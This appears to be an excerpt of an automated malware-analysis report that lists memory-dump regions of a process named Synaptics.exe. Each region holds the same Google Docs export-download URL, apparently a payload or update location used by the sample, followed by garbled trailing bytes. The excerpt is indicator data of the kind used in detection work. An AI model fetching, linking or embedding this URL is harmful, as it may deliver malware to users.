                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060118245.00000000260BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3005164799.000000000E8BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3040814642.000000001D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3048085314.000000001EBBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.000000000548F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3035545859.000000001A67E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060544260.00000000265BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3037524133.000000001BCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033585787.0000000018D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3054482088.00000000238BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2917655340.000000000672E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032103666.0000000017BFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033694035.0000000018EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3036913067.000000001B6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3053663351.0000000022EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3061791893.000000002737E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3025660227.00000000135FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3053151560.000000002287E000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000003.00000002.3036210006.000000001ADFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033079710.000000001873E000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:73F
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:d1
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;5G
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;K
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;f
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=ISG
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?a
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-WoW
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB7KF&
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB;
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBa
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBitn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCKHE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCb
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD%
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD0
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD;
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD?
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDG
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDR
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDg
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDo
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDo-
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDxGD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE&
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE-;
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE1
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEM
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadESF
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEa
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEh
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEn
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEr
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEr0
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEs%
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF0OE
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG:
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHb
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHyCE
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIf
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ1CD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJg
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKa
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL:
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMa
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNM
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO;
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOITG%
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOY
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOa
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgJlD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadga
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgg
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgin-O
